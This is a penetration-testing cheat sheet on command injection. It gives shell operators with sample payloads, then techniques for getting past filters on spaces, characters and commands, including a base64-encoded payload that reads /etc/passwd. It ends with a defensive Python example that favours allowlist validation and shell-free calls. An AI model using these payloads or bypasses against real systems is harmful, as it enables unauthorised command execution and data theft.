# Command Injection Testing

<table><thead><tr><th width="201">Parameter</th><th>Objective</th></tr></thead><tbody><tr><td><code>-h</code> or <code>/?</code></td><td>What is the system output from using help menu commands?</td></tr><tr><td><code>;</code>,<br><code>; echo whoami</code></td><td>Unix only; run echo after initial command</td></tr><tr><td><code>|</code>,<br><code>echo whoami|</code></td><td>Perl-specific injection to open files</td></tr><tr><td><p><code>||</code>,</p><p><code>|| echo whoami</code></p></td><td>Run command if the initial command returns non-zero as the exit status</td></tr><tr><td><code>&#x26;</code>,<br><code>&#x26; echo whoami</code></td><td>Run initial command as background task and run next task immediately</td></tr><tr><td><code>&#x26;&#x26;</code>,<br><code>&#x26;&#x26; echo whoami</code></td><td>Run if the initial command returns zero as the exit status</td></tr><tr><td><code>$(whoami)</code></td><td>Unix only; Bash command substitution</td></tr><tr><td><code>`whoami`</code></td><td>Unix only; command substitution using backticks</td></tr><tr><td><code>>(whoami)</code></td><td>Unix only; using process substitution</td></tr></tbody></table>

## Identifying Blacklisted Characters

Send each of the command injection operators through Burp and check which ones the application rejects.

#### Bypassing Space Filters

```bash
# Add TAB
%09

# Add SPACE
${IFS}

# Add Brace Expansion
{ls,-al}
```

#### Bypassing Other Blacklisted Characters (Linux)

```bash
# Add /
${PATH:0:1}

# Add ;
${LS_COLORS:10:1}

# Character shifting: look up the target in `man ascii` (\ is 92),
# then shift the character just before it ([ is 91) up by one
$(tr '!-}' '"-~'<<<[)
```

#### Bypassing Other Blacklisted Characters (Windows)

```powershell
# Add \ (CMD; the offsets depend on the length of the home path)
%HOMEPATH:~6,-11%
# Add \ (PowerShell)
$env:HOMEPATH[0]
```

#### Bypassing Blacklisted Commands (Linux)

```bash
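# Quote insertion
w'h'o'am'i
w"h"o"am"i
# Characters the shell ignores
who$@ami
w\ho\am\i
# Case manipulation
$(tr "[A-Z]" "[a-z]"<<<"WhOaMi")
$(a="WhOaMi";printf %s "${a,,}")
# Reversed command
$(rev<<<'imaohw')
# Base64-encoded command
bash<<<$(base64 -d<<<Y2F0IC9ldGMvcGFzc3dkIHwgZ3JlcCAzMw==)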
```
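
Why the filters tested above fail, as an added example (not from the original page): a constructed denylist accepts strings copied from this page, while allowlist parsing plus a shell-free argument vector rejects them. The ping handler, `DENYLIST` and all function names are assumptions for illustration.

```python
import ipaddress
import subprocess

# Constructed denylist, typical of the filters the techniques on this page target.
DENYLIST = [" ", ";", "&", "|", "/", "whoami"]

# Strings copied from this page; none contains a denylisted character or word.
PAGE_STRINGS = [
    "{ls,-al}",
    "${PATH:0:1}",
    "${LS_COLORS:10:1}",
    "w'h'o'am'i",
    "who$@ami",
    "w\\ho\\am\\i",
    "$(rev<<<'imaohw')",
]


def denylist_allows(value):
    """Weak check: accept anything that lacks a blocked character or word."""
    return not any(bad in value for bad in DENYLIST)


def parse_host(value):
    """Allowlist check: accept only a literal IPv4/IPv6 address."""
    return str(ipaddress.ip_address(value))  # raises ValueError otherwise


def allowlist_allows(value):
    try:
        parse_host(value)
        return True
    except ValueError:
        return False


def build_ping_argv(value):
    """Argument vector for the hypothetical ping handler; no shell parses it."""
    return ["ping", "-c", "1", parse_host(value)]


def run_ping(value):
    # shell=False: the validated host reaches ping as a single argv entry.
    return subprocess.run(build_ping_argv(value), shell=False,
                          capture_output=True, text=True, timeout=5, check=False)


if __name__ == "__main__":
    for s in PAGE_STRINGS + ["127.0.0.1"]:
        print(f"{s!r:24} denylist={denylist_allows(s)} allowlist={allowlist_allows(s)}")
```

Every page string passes the denylist and fails the allowlist, so the fix is to validate against the expected input format and keep the shell out of the call path rather than to extend the blocked list.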
